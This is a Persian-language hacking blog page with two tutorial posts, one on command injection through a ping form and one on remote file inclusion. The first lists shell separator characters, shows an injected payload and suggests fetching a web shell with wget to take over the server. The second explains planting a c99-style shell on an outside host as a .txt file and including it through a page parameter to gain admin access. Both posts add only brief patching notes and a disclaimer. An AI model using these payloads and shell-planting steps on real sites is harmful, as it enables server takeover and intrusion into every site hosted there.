تیم سایبری محمد رسول الله

خانه درباره ما تماس با ما shell package <tel> کانال <tel/>

۵ مطلب با موضوع «تست نفوذ وب» ثبت شده است

اموزش باگ Rce + پچ کردن

به نام خدا

با یک قسمت دیگه از دوره اموزشی وب هکینگ در خدمتتون هستیم و قراره یک باگ خیلی خفن ساده و کاربردی رو بگیم

 

باگ rce چیست ؟

باگ rce جزو پر خطر ترین باگ ها محسوب میشه چون تمام دستورات سیستمی با دسترسی بالا ران میشه.

باگ RCE مخفف Remote Code Execution هست که متاسفانه در حال گسترش هست که توی این مطلب میخوایم روش نفوذ با باگ rce و پچ کردن با rce رو با هم یاد بگیریم

 

 

نفوذ به سیستم با باگ rce :

ما برای مثال روی یک سایتی که پینگ ایپی و سایت ها رو میگیره تست میکنیم

یعنی داخل اسکریپتش گفته شده هر ورودی که وارد شد رو بعد از دستور ping بزار و اون رو داخل ترمینال ران کن و خورجی رو نمایش بده

خب تا اینجا که باگی نیست اما میتونیم داخل ترمینال یا cmd دو دستور رو داخل یک خط وارد کنیم! و اینجا مشکل کاره J مثلا ما ادرس opensec.blog.ir رو بهش میدیم و اون دستور زیر رو داخل خط فرمان اجرا میکنه

Ping opensec.blog.ir

اما اگر این دستور رو با کاراکتر های مختلفی نظیر:

 

'|'
'||'
' | '
' || '
' |'
'&'
'&&'
';'
'$'
برای مشخص شدن فاصله ها اون هارو داخل تک کوتیشن قرار دادم خودتون هم میتونید دو طرف وسط یا... هم فاصله بزارین و تست کنین

این کامند ها کامل نیستن و کامند های دیگه ای هم هست

 

 

از هم جدا کنیم و بعدش دستور خودمون رو وارد کنیم مثل نمونه زیر اون هر دو تا رو اجرا میکنه

Opensec.blog.ir|dir

و خروجی که تون به خط فرمان میده به شکل زیره:

Ping opensec.blog.ir|dir

خروجی که به ما میده به این صورته که اول نتیجه پینگ رو نشون میده و بعد از اون اگه سیستم ویندوزی باشه لیست فایل های داخل مسیر رو نشون میده حالا اگه ما به جای این دستور ساده بادستور ویگت شل خودمون رو اپلود کنیم و از کل سرور دسترسی بگیریم چی؟ اون موقع دیگه تمام سرور هم ممکنه با سیملینک هک بشه و تمام سایت های روی سرور در خطر ان

 

اموزش پچ کردن باگ rce :

در این باگ هم شما باید ورودی ها رو کنترل کنین مثلا تعریف کنین که فلان ورودی ها غیر مجازن و بگین مثلا ورودی که میگیره از n کاراکتر بیشتر نباشه یا ورودی که میگیره n بخش بیشتر نباشه  یا یک لیست سفید تعریف کنیم و بگیم اگر غیر از این هم بود دستور ران نشه و هزاران فیلتر دیگه که میشه روی ورودی ها اعمال کرد

 

تیم ما هیچ گونه مسئولیتی در قبال سوء استفاده برخی افراد ندارد

اگر سوالی داشتین یا مطلب مشکلی داشت حتما در بخش نظرات به اشتراک بزارین

۱۷ تیر ۰۰ ، ۱۳:۴۶ ۰ نظر

هک سایت با باگ RFI + تامین امنیت

به نام خدا

با اموزش باگ rfi  در دوره اموزش های تست نفوذ وب اپلیکیشن در خدمتتونیم

 

 

 باگ RFI چیست ؟

باگ rfi جزو خطرناک ترین باگ ها محسوب میشه چون میشه با اون دسترسی سرور هم گرفت

این باگ توسط اشتباهات برنامه نویسی ایجاد میشود و مخفف Remote File Inclusion است که مستقیما باعث اجرای شل اسکریپت در سرور شود برای پچ کردن این باگ نیازه دستورات http:// , https:// در ورودی ها ممنوع بشه و از فایروال ها استفاده بشه

 

 

اموزش باگ RFI

برای پیدا کردن باگ باید ورودی های مشکوک رو مورد تست قرار بدین

و میتونین از شل های مختلفی مثل :c99 , alpha , c100 , minishell , … هم استفاده کنین

اول باید شل خودتون رو داخل یک هاست اپلود کین کنین ( باید پسوند فایل رو از پی اچ پی به .txt تغییر بدین )

به عنوان مثال به ادرس زیر توجه کنید

http://target.com/intex.php?page=index.php

در ورودی بالا وبسایت index رو به عنوان ورودی میگیره حالا اگر ما بجای index ادرس شل خودمون رو بدیم شل ما رو اجرا میکنه! و دسترسی ادمین از کل سایت یا سرور میگیریم

و url نهایی ما به شکل زیر میشه

http://target.com/index.php?page=http://host.com/myShell.txt

 

تیم ما هیچ گونه مسئولیتی در قبال سوء استفاده برخی افراد ندارد!

اگر سوال یا ابهامی بود در بخش نظرات مطرح کنید

۱۱ تیر ۰۰ ، ۱۷:۲۹ ۰ نظر